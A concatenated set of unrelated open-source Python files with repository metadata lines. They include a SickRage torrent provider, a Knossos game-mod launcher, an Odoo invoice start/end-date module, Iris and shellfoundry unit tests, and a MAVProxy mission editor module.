item = title, url, info_hash, seeders, leechers, size, pubdate
items[mode].append(item)
except Exception:
logger.log(u"Failed to parsing " + self.name + " Traceback: " + traceback.format_exc(),
logger.WARNING)
#For each search mode sort all the items by seeders
items[mode].sort(key=lambda tup: tup[3], reverse=True)
results += items[mode]
return results
def _get_title_and_url(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
if title:
title = self._clean_title_from_provider(title)
if url:
url = url.replace('&', '&')
return (title, url)
def findPropers(self, search_date=datetime.datetime.today()-datetime.timedelta(days=1)):
results = []
myDB = db.DBConnection()
sqlResults = myDB.select(
'SELECT s.show_name, e.showid, e.season, e.episode, e.status, e.airdate, s.indexer FROM tv_episodes AS e' +
' INNER JOIN tv_shows AS s ON (e.showid = s.indexer_id)' +
' WHERE e.airdate >= ' + str(search_date.toordinal()) +
' AND (e.status IN (' + ','.join([str(x) for x in Quality.DOWNLOADED]) + ')' +
' OR (e.status IN (' + ','.join([str(x) for x in Quality.SNATCHED]) + ')))'
)
for sqlshow in sqlResults or []:
show = helpers.findCertainShow(sickbeard.showList, int(sqlshow["showid"]))
if show:
curEp = show.getEpisode(int(sqlshow["season"]), int(sqlshow["episode"]))
searchStrings = self._get_episode_search_strings(curEp, add_string='PROPER|REPACK')
for item in self._doSearch(searchStrings):
title, url = self._get_title_and_url(item)
pubdate = item[6]
results.append(classes.Proper(title, url, pubdate, show))
return results
def seedRatio(self):
return self.ratio
class KATCache(tvcache.TVCache):
def __init__(self, provider_obj):
tvcache.TVCache.__init__(self, provider_obj)
# only poll KickAss every 10 minutes max
self.minTime = 20
def _getRSSData(self):
search_params = {'RSS': ['']}
return {'entries': self.provider._doSearch(search_params)}
provider = KATProvider()
| elit3ge/SickRage | sickbeard/providers/kat.py | Python | gpl-3.0 | 9,861 | 0.003752 |
PRIORITY_EMAIL_NOW = 0
PRIORITY_HIGH = 1
PRIORITY_NORMAL = 3
PRIORITY_LOW = 5
RESULT_SENT = 0
RESULT_SKIPPED = 1
RESULT_FAILED = 2
PRIORITIES = {
'now': PRIORITY_EMAIL_NOW,
'high': PRIORITY_HIGH,
'normal': PRIORITY_NORMAL,
'low': PRIORITY_LOW,
}
PRIORITY_HEADER = 'X-Mail-Queue-Priority'
try:
from django.core.mail import get_connection
EMAIL_BACKEND_SUPPORT = True
except ImportError:
# Django version < 1.2
EMAIL_BACKEND_SUPPORT = False
| mfwarren/django-mailer-2 | django_mailer/constants.py | Python | mit | 475 | 0 |
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os
import logging
import subprocess
import time
import json
import traceback
import ssl
import six
from six.moves.urllib import parse as urlparse
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')
# We have to be in the correct directory *before* we import clibs so we're going to do this as early as possible.
if hasattr(sys, 'frozen'):
if hasattr(sys, '_MEIPASS'):
os.chdir(sys._MEIPASS)
else:
os.chdir(os.path.dirname(sys.executable))
else:
my_path = os.path.dirname(__file__)
if my_path != '':
os.chdir(my_path)
from . import uhf
uhf(__name__)
from . import center
# Initialize the FileHandler early to capture all log messages.
if not os.path.isdir(center.settings_path):
os.makedirs(center.settings_path)
# We truncate the log file on every start to avoid filling the user's disk with useless data.
log_path = os.path.join(center.settings_path, 'log.txt')
try:
if os.path.isfile(log_path):
os.unlink(log_path)
except Exception:
# This will only be visible if the user is running a console version.
logging.exception('The log is in use by someone!')
else:
handler = logging.FileHandler(log_path, 'w')
handler.setFormatter(logging.Formatter('%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s'))
handler.setLevel(logging.DEBUG)
logging.getLogger().addHandler(handler)
if not center.DEBUG:
logging.getLogger().setLevel(logging.INFO)
if six.PY2:
from . import py2_compat # noqa
from .qt import QtCore, QtGui, QtWidgets, variant as qt_variant
from . import util, ipc, auto_fetch
app = None
ipc_conn = None
translate = QtCore.QCoreApplication.translate
def my_excepthook(type, value, tb):
try:
# NOTE: This can fail (for some reason) in traceback.print_exception.
logging.error('UNCAUGHT EXCEPTION!', exc_info=(type, value, tb))
except Exception:
logging.error('UNCAUGHT EXCEPTION!\n%s%s: %s' % (''.join(traceback.format_tb(tb)), type.__name__, value))
msg = translate('launcher', 'A critical error occurred! Knossos might not work correctly until you restart it.')
if center.raven:
msg += '\n' + translate('launcher', 'The error has been reported and will hopefully be fixed soon.')
msg += '\n' + translate('launcher', 'If you want to help, report this bug on our Discord channel, ' +
'in the HLP thread or on GitHub. Just click a button below to open the relevant page.')
try:
box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, 'Knossos', msg, QtWidgets.QMessageBox.Ok)
discord = box.addButton('Open Discord', QtWidgets.QMessageBox.ActionRole)
hlp = box.addButton('Open HLP Thread', QtWidgets.QMessageBox.ActionRole)
github = box.addButton('Open GitHub Issues', QtWidgets.QMessageBox.ActionRole)
box.exec_()
choice = box.clickedButton()
url = None
if choice == discord:
url = 'https://discord.gg/qfReB8t'
elif choice == hlp:
url = 'https://www.hard-light.net/forums/index.php?topic=94068.0'
elif choice == github:
url = 'https://github.com/ngld/knossos/issues'
if url:
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))
except Exception:
pass
def get_cmd(args=[]):
if hasattr(sys, 'frozen'):
my_path = [os.path.abspath(sys.executable)]
else:
my_path = [os.path.abspath(sys.executable), os.path.abspath('__main__.py')]
return my_path + args
def get_file_path(name):
if hasattr(sys, 'frozen') or os.path.isdir('data'):
return os.path.join('data', name)
else:
from pkg_resources import resource_filename
return resource_filename(__package__, name)
def load_settings():
spath = os.path.join(center.settings_path, 'settings.json')
settings = center.settings
if os.path.exists(spath):
try:
with open(spath, 'r') as stream:
settings.update(json.load(stream))
except Exception:
logging.exception('Failed to load settings from "%s"!', spath)
# Migration
if 's_version' not in settings:
settings['s_version'] = 0
if settings['s_version'] < 6:
for name in ('mods', 'installed_mods', 'repos', 'nebula_link', 'nebula_web'):
if name in settings:
del settings[name]
settings['s_version'] = 6
else:
# Most recent settings version
settings['s_version'] = 6
if settings['hash_cache'] is not None:
util.HASH_CACHE = settings['hash_cache']
if settings['use_raven']:
util.enable_raven()
if settings['repos_override']:
center.REPOS = settings['repos_override']
if settings['api_override']:
center.API = settings['api_override']
if settings['web_override']:
center.WEB = settings['web_override']
if settings['debug_log']:
logging.getLogger().setLevel(logging.DEBUG)
util.ensure_tempdir()
return settings
def run_knossos():
global app
from .windows import HellWindow
center.app = app
center.main_win = HellWindow()
app.processEvents()
if sys.platform.startswith('win') and os.path.isfile('7z.exe'):
util.SEVEN_PATH = os.path.abspath('7z.exe')
elif sys.platform == 'darwin' and os.path.isfile('7z'):
util.SEVEN_PATH = os.path.abspath('7z')
translate = QtCore.QCoreApplication.translate
if not util.test_7z():
QtWidgets.QMessageBox.critical(None, 'Knossos', translate(
'launcher', 'I can\'t find "7z"! Please install it and run this program again.'))
return
util.DL_POOL.set_capacity(center.settings['max_downloads'])
if center.settings['download_bandwidth'] > 0.0:
util.SPEED_LIMIT_BUCKET.set_rate(center.settings['download_bandwidth'])
from . import repo, progress, integration
center.installed = repo.InstalledRepo()
center.pmaster = progress.Master()
center.pmaster.start_workers(10)
center.mods = repo.Repo()
center.auto_fetcher = auto_fetch.AutoFetcher()
# This has to run before we can load any mods!
repo.CPU_INFO = util.get_cpuinfo()
integration.init()
mod_db = os.path.join(center.settings_path, 'mods.json')
if os.path.isfile(mod_db):
try:
center.mods.load_json(mod_db)
except Exception:
logging.exception('Failed to load local mod list!')
center.mods.clear()
center.main_win.start_init()
app.exec_()
center.save_settings()
ipc.shutdown()
def handle_ipc_error():
global app, ipc_conn
logging.warning('Failed to connect to main process!')
if ipc_conn is not None:
ipc_conn.clean()
ipc_conn = None
def scheme_handler(link):
global app, ipc_conn
if not link.startswith(('fs2://', 'fso://')):
# NOTE: fs2:// is deprecated, we don't tell anyone about it.
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I don\'t know how to handle "%s"! I only know fso:// .') % (link))
app.quit()
return True
link = urlparse.unquote(link.strip()).split('/')
if len(link) < 3:
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Not enough arguments!'))
app.quit()
return True
if not ipc_conn.server_exists():
# Launch the program.
subprocess.Popen(get_cmd())
# Wait for the program...
start = time.time()
while not ipc_conn.server_exists():
if time.time() - start > 20:
# That's too long!
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Failed to start server!'))
app.quit()
return True
time.sleep(0.3)
try:
ipc_conn.open_connection(handle_ipc_error)
except Exception:
logging.exception('Failed to connect to myself!')
handle_ipc_error()
return False
if not ipc_conn:
return False
ipc_conn.send_message(json.dumps(link[2:]))
ipc_conn.close(True)
app.quit()
return True
def main():
global ipc_conn, app
# Default to replacing errors when de/encoding.
import codecs
codecs.register_error('strict', codecs.replace_errors)
codecs.register_error('really_strict', codecs.strict_errors)
sys.excepthook = my_excepthook
# The version file is only read in dev builds.
if center.VERSION.endswith('-dev'):
if 'KN_VERSION' in os.environ:
center.VERSION = os.environ['KN_VERSION'].strip()
else:
try:
with open('../.git/HEAD') as stream:
ref = stream.read().strip().split(':')
assert ref[0] == 'ref'
with open('../.git/' + ref[1].strip()) as stream:
center.VERSION += '+' + stream.read()[:7]
except Exception:
pass
logging.info('Running Knossos %s on %s and Python %s.', center.VERSION, qt_variant, sys.version)
logging.info('OpenSSL version: %s', ssl.OPENSSL_VERSION)
app = QtWidgets.QApplication([])
res_path = get_file_path('resources.rcc')
logging.debug('Loading resources from %s.', res_path)
QtCore.QResource.registerResource(res_path)
logging.debug('Loading settings...')
load_settings()
trans = QtCore.QTranslator()
if center.settings['language']:
lang = center.settings['language']
else:
lang = QtCore.QLocale()
if trans.load(lang, 'knossos', '_', get_file_path(''), '.etak'):
app.installTranslator(trans)
else:
del trans
app.setWindowIcon(QtGui.QIcon(':/hlp.png'))
ipc_conn = ipc.IPCComm(center.settings_path)
if len(sys.argv) > 1:
if sys.argv[1] == '--finish-update':
updater = sys.argv[2]
if not os.path.isfile(updater):
logging.error('The update finished but where is the installer?! It\'s not where it\'s supposed to be! (%s)', updater)
else:
tries = 3
while tries > 0:
try:
# Clean up
os.unlink(updater)
except Exception:
logging.exception('Failed to remove updater! (%s)' % updater)
if os.path.isfile(updater):
time.sleep(0.3)
tries -= 1
else:
break
# Delete the temporary directory.
if os.path.basename(updater) == 'knossos_updater.exe':
try:
os.rmdir(os.path.dirname(updater))
except Exception:
logging.exception('Failed to remove the updater\'s temporary directory.')
elif sys.argv[1].startswith('-psn_'):
# This parameter is automatically passed by Finder on macOS, ignore it.
pass
else:
tries = 3
while tries > 0:
if scheme_handler(sys.argv[1]):
break
tries -= 1
ipc_conn = ipc.IPCComm(center.settings_path)
if tries == 0:
sys.exit(1)
return
elif ipc_conn.server_exists() and scheme_handler('fso://focus'):
return
del ipc_conn
try:
run_knossos()
except Exception:
logging.exception('Uncaught exeception! Quitting...')
# Try to tell the user
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I encountered a fatal error.\nI\'m sorry but I\'m going to crash now...'))
| MjnMixael/knossos | knossos/launcher.py | Python | apache-2.0 | 12,595 | 0.003335 |
#!/usr/bin/env python
# coding=utf-8
import pprint
import csv
import click
import requests
import datetime as datetime
from datetime import date
from xml.etree import ElementTree as ET
import os
# from random import sample
import random
import json
# import logging
import subprocess
import glob
import time
@click.command()
@click.option('--days', default=10, type=int)
@click.option('--span', default=5, type=int)
# @click.option('--duration', default=3, type=int)
# @click.option('--days', default=1, type=int)
def ctripmultiplus(days, span):
start_days = days
for i in range(span):
subprocess.call(['python', 'ctripplus.py', '--days', str(start_days + i*10)])
for i in range(3):
print('sleeping..')
time.sleep(1)
# newest = max(glob.iglob('output_Search_item_hr_*.csv'), key=os.path.getctime)
# subprocess.call(['python', 'sendmail.py', '--filename', 'output_hotel_ref_*.csv', '--title', 'Ctrip_hotel_ref'])
if __name__ == '__main__':
ctripmultiplus() | Fatman13/gta_swarm | ctripmultiplus.py | Python | mit | 1,017 | 0.013766 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cases', '0021_migrate_case_contacts'),
('msgs', '0008_messageaction'),
]
operations = [
migrations.RemoveField(
model_name='messageaction',
name='created_by',
),
migrations.RemoveField(
model_name='messageaction',
name='label',
),
migrations.RemoveField(
model_name='messageaction',
name='org',
),
migrations.DeleteModel(
name='MessageAction',
),
]
| xkmato/casepro | casepro/cases/migrations/0022_delete_mesageaction.py | Python | bsd-3-clause | 697 | 0 |
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Unit tests for the :func:`iris.analysis.maths.divide` function."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import operator
from iris.analysis.maths import divide
from iris.cube import Cube
from iris.tests.unit.analysis.maths import (
CubeArithmeticBroadcastingTestMixin,
CubeArithmeticMaskingTestMixin,
CubeArithmeticCoordsTest,
)
@tests.skip_data
@tests.iristest_timing_decorator
class TestBroadcasting(
tests.IrisTest_nometa, CubeArithmeticBroadcastingTestMixin
):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
@tests.iristest_timing_decorator
class TestMasking(tests.IrisTest_nometa, CubeArithmeticMaskingTestMixin):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
def test_unmasked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.array([0.0, 0.0, 0.0, 0.0])
dat_b = np.array([2.0, 2.0, 2.0, 2.0])
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertArrayEqual(com, res)
def test_masked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.ma.array([0.0, 0.0, 0.0, 0.0], mask=False)
dat_b = np.ma.array([2.0, 2.0, 2.0, 2.0], mask=False)
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertMaskedArrayEqual(com, res, strict=True)
class TestCoordMatch(CubeArithmeticCoordsTest):
def test_no_match(self):
cube1, cube2 = self.SetUpNonMatching()
with self.assertRaises(ValueError):
divide(cube1, cube2)
def test_reversed_points(self):
cube1, cube2 = self.SetUpReversed()
with self.assertRaises(ValueError):
divide(cube1, cube2)
if __name__ == "__main__":
tests.main()
| pp-mo/iris | lib/iris/tests/unit/analysis/maths/test_divide.py | Python | lgpl-3.0 | 2,496 | 0 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
import os
from setuptools import setup, find_packages
def get_version():
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, 'instapush/version.py')) as f:
locals = {}
exec(f.read(), locals)
return locals['VERSION']
raise RuntimeError('No version info found.')
setup(
name='instapush',
version = get_version(),
keywords = ('instapush', 'tools'),
description = 'a python wrapper for instapush',
license = 'MIT License',
url = 'https://github.com/adamwen829/instapush-py',
author = 'Adam Wen',
author_email = 'adamwen829@gmail.com',
packages = find_packages(),
include_package_data = True,
platforms = 'any',
install_requires = ['requests']
)
| adamwen829/instapush-py | setup.py | Python | mit | 894 | 0.025727 |
# -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
_("Start Date should be before or be the same as "
"End Date for invoice line with Description '%s'.")
% (invline.name))
# Note : we can't check invline.product_id.must_have_dates
# have start_date and end_date here, because it would
# block automatic invoice generation/import. So we do the check
# upon validation of the invoice (see below the function
# action_move_create)
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):
"""Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res:
iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()
| stellaf/sales_rental | account_invoice_start_end_dates/models/account_invoice.py | Python | gpl-3.0 | 3,875 | 0 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
if sys.version_info >= (3, 0):
from unittest.mock import patch
else:
from mock import patch
from pyfakefs import fake_filesystem_unittest
from shellfoundry.utilities.config.config_context import ConfigContext
from shellfoundry.utilities.config.config_file_creation import ConfigFileCreation
from shellfoundry.utilities.config.config_record import ConfigRecord
class TestConfigRecord(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@patch(
"shellfoundry.utilities.config.config_file_creation.open", create=True
) # create=True to overcome the issue with builtin methods default fallback
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_config_file(self, echo_mock, open_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
cfg_creation = ConfigFileCreation()
# Assert
self.assertRaises(IOError, cfg_creation.create, cfg_path)
echo_mock.assert_any_call(
"Failed to create the file, maybe it is already exists"
)
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.open", create=True)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_crate_config_file_due_to_already_exists_no_error_is_raised(
self, echo_mock, open_mock
):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
open_mock.side_effect = [
IOError("Failed to create the file, maybe it is already exists")
]
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.path.exists"
) as path_mock:
path_mock.side_effect = [False, True, True]
ConfigFileCreation().create(cfg_path)
# Assert
echo_mock.assert_called_once_with("Creating config file...")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_create_folder_hierarchy(self, echo_mock):
# Arrange
cfg_path = "/quali/shellfoundry/global_config.yml"
# Act
with patch(
"shellfoundry.utilities.config.config_file_creation.os.makedirs"
) as makedirs_mock:
makedirs_mock.side_effect = [
OSError("Failed to create the folders hierarchy")
]
self.assertRaises(OSError, ConfigFileCreation().create, cfg_path)
# Assert
echo_mock.assert_any_call("Failed to create config file")
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_save_new_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("key", "value")
record.save(context)
# Assert
echo_mock.assert_called_once_with("Failed to save key value")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
host: someaddress""",
os.linesep,
file_content,
),
)
@patch("shellfoundry.utilities.config.config_file_creation.click.echo")
def test_failed_to_delete_record(self, echo_mock):
# Arrange
self.fs.create_file(
"/quali/shellfoundry/global_config.yml",
contents="""
install:
host: someaddress""",
)
# Act
with patch("shellfoundry.utilities.config.config_context.yaml") as yaml_mock:
yaml_mock.safe_load.side_effect = [Exception()]
context = ConfigContext("/quali/shellfoundry/global_config.yml")
record = ConfigRecord("host")
record.delete(context)
# Assert
echo_mock.assert_called_once_with("Failed to delete key")
file_content = self.fs.get_object(
"/quali/shellfoundry/global_config.yml"
).contents
import os
self.assertTrue(
file_content
== """
install:
host: someaddress""",
"Expected: {}{}Actual: {}".format(
"""
install:
""",
os.linesep,
file_content,
),
)
| QualiSystems/shellfoundry | tests/test_utilities/config/test_config_record.py | Python | apache-2.0 | 5,062 | 0.001185 |
#!/usr/bin/env python
'''
mission editor module
Michael Day
June 2104
'''
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import mp_util
from MAVProxy.modules.mavproxy_misseditor import me_event
MissionEditorEvent = me_event.MissionEditorEvent
from pymavlink import mavutil
import multiprocessing, time
import threading
import Queue
import traceback
class MissionEditorEventThread(threading.Thread):
def __init__(self, mp_misseditor, q, l):
threading.Thread.__init__(self)
self.mp_misseditor = mp_misseditor
self.event_queue = q
self.event_queue_lock = l
self.time_to_quit = False
def run(self):
while not self.time_to_quit:
queue_access_start_time = time.time()
self.event_queue_lock.acquire()
request_read_after_processing_queue = False
while self.event_queue.qsize() > 0 and (time.time() - queue_access_start_time) < 0.6:
event = self.event_queue.get()
if event.get_type() == me_event.MEE_READ_WPS:
self.mp_misseditor.mpstate.module('wp').cmd_wp(['list'])
#list the rally points while I'm add it:
#TODO: DON'T KNOW WHY THIS DOESN'T WORK
#self.mp_misseditor.mpstate.module('rally').cmd_rally(['list'])
#means I'm doing a read & don't know how many wps to expect:
self.mp_misseditor.num_wps_expected = -1
self.wps_received = {}
elif event.get_type() == me_event.MEE_TIME_TO_QUIT:
self.time_to_quit = True
elif event.get_type() == me_event.MEE_GET_WP_RAD:
wp_radius = self.mp_misseditor.module('param').mav_param.get('WP_RADIUS')
if (wp_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_RAD,wp_rad=wp_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_RAD:
self.mp_misseditor.param_set('WP_RADIUS',event.get_arg("rad"))
elif event.get_type() == me_event.MEE_GET_LOIT_RAD:
loiter_radius = self.mp_misseditor.module('param').mav_param.get('WP_LOITER_RAD')
if (loiter_radius is None):
continue
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LOIT_RAD,loit_rad=loiter_radius))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_LOIT_RAD:
loit_rad = event.get_arg("rad")
if (loit_rad is None):
continue
self.mp_misseditor.param_set('WP_LOITER_RAD', loit_rad)
#need to redraw rally points
# Don't understand why this rally refresh isn't lagging...
# likely same reason why "timeout setting WP_LOITER_RAD"
#comes back:
#TODO: fix timeout issue
self.mp_misseditor.mpstate.module('rally').rallyloader.last_change = time.time()
elif event.get_type() == me_event.MEE_GET_WP_DEFAULT_ALT:
self.mp_misseditor.gui_event_queue_lock.acquire()
self.mp_misseditor.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_WP_DEFAULT_ALT,def_wp_alt=self.mp_misseditor.mpstate.settings.wpalt))
self.mp_misseditor.gui_event_queue_lock.release()
elif event.get_type() == me_event.MEE_SET_WP_DEFAULT_ALT:
self.mp_misseditor.mpstate.settings.command(["wpalt",event.get_arg("alt")])
elif event.get_type() == me_event.MEE_WRITE_WPS:
self.mp_misseditor.module('wp').wploader.clear()
self.mp_misseditor.master.waypoint_count_send(event.get_arg("count"))
self.mp_misseditor.num_wps_expected = event.get_arg("count")
self.mp_misseditor.wps_received = {}
elif event.get_type() == me_event.MEE_WRITE_WP_NUM:
w = mavutil.mavlink.MAVLink_mission_item_message(
self.mp_misseditor.target_system,
self.mp_misseditor.target_component,
event.get_arg("num"),
event.get_arg("frame"),
event.get_arg("cmd_id"),
0, 1,
event.get_arg("p1"), event.get_arg("p2"),
event.get_arg("p3"), event.get_arg("p4"),
event.get_arg("lat"), event.get_arg("lon"),
event.get_arg("alt"))
self.mp_misseditor.module('wp').wploader.add(w)
self.mp_misseditor.master.mav.send(
self.mp_misseditor.module('wp').wploader.wp(w.seq))
#tell the wp module to expect some waypoints
self.mp_misseditor.module('wp').loading_waypoints = True
elif event.get_type() == me_event.MEE_LOAD_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['load',event.get_arg("path")])
#Wait for the other thread to finish loading waypoints.
#don't let this loop run forever in case we have a lousy
#link to the plane
i = 0
while (i < 10 and
self.mp_misseditor.module('wp').loading_waypoints):
time.sleep(1)
i = i + 1
#don't modify queue while in the middile of processing it:
request_read_after_processing_queue = True
elif event.get_type() == me_event.MEE_SAVE_WP_FILE:
self.mp_misseditor.module('wp').cmd_wp(['save',event.get_arg("path")])
self.event_queue_lock.release()
#if event processing operations require a mission referesh in GUI
#(e.g., after a load or a verified-completed write):
if (request_read_after_processing_queue):
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_READ_WPS))
self.event_queue_lock.release()
#periodically re-request WPs that were never received:
#DON'T NEED TO! -- wp module already doing this
time.sleep(0.2)
class MissionEditorModule(mp_module.MPModule):
'''
A Mission Editor for use with MAVProxy
'''
def __init__(self, mpstate):
super(MissionEditorModule, self).__init__(mpstate, "misseditor", "mission editor", public = True)
self.num_wps_expected = 0 #helps me to know if all my waypoints I'm expecting have arrived
self.wps_received = {}
from ..lib.multiprocessing_queue import makeIPCQueue
self.event_queue = makeIPCQueue()
self.event_queue_lock = multiprocessing.Lock()
self.gui_event_queue = makeIPCQueue()
self.gui_event_queue_lock = multiprocessing.Lock()
self.event_thread = MissionEditorEventThread(self, self.event_queue, self.event_queue_lock)
self.event_thread.start()
self.close_window = multiprocessing.Semaphore()
self.close_window.acquire()
self.child = multiprocessing.Process(target=self.child_task,args=(self.event_queue,self.event_queue_lock,self.gui_event_queue,self.gui_event_queue_lock,self.close_window))
self.child.start()
self.mpstate.miss_editor = self
self.last_unload_check_time = time.time()
self.unload_check_interval = 0.1 # seconds
self.time_to_quit = False
self.mavlink_message_queue = Queue.Queue()
self.mavlink_message_queue_handler = threading.Thread(target=self.mavlink_message_queue_handler)
self.mavlink_message_queue_handler.start()
def mavlink_message_queue_handler(self):
while not self.time_to_quit:
try:
m = self.mavlink_message_queue.get(block=0)
except Queue.Empty:
time.sleep(0.1)
continue
#MAKE SURE YOU RELEASE THIS LOCK BEFORE LEAVING THIS METHOD!!!
#No "return" statement should be put in this method!
self.gui_event_queue_lock.acquire()
try:
self.process_mavlink_packet(m)
except Exception as e:
print("Caught exception (%s)" % str(e))
traceback.print_stack()
self.gui_event_queue_lock.release()
def unload(self):
'''unload module'''
self.mpstate.miss_editor.close()
self.mpstate.miss_editor = None
def idle_task(self):
now = time.time()
if self.last_unload_check_time + self.unload_check_interval < now:
self.last_unload_check_time = now
if not self.child.is_alive():
self.needs_unloading = True
def mavlink_packet(self, m):
if m.get_type() in ['WAYPOINT_COUNT','MISSION_COUNT', 'WAYPOINT', 'MISSION_ITEM']:
self.mavlink_message_queue.put(m)
def process_mavlink_packet(self, m):
'''handle an incoming mavlink packet'''
mtype = m.get_type()
# if you add processing for an mtype here, remember to add it
# to mavlink_packet, above
if mtype in ['WAYPOINT_COUNT','MISSION_COUNT']:
if (self.num_wps_expected == 0):
#I haven't asked for WPs, or these messages are duplicates
#of msgs I've already received.
self.console.error("No waypoint load started (from Editor).")
#I only clear the mission in the Editor if this was a read event
elif (self.num_wps_expected == -1):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_CLEAR_MISS_TABLE))
self.num_wps_expected = m.count
self.wps_received = {}
if (m.count > 0):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_ADD_MISS_TABLE_ROWS,num_rows=m.count-1))
#write has been sent by the mission editor:
elif (self.num_wps_expected > 1):
if (m.count != self.num_wps_expected):
self.console.error("Unepxected waypoint count from APM after write (Editor)")
#since this is a write operation from the Editor there
#should be no need to update number of table rows
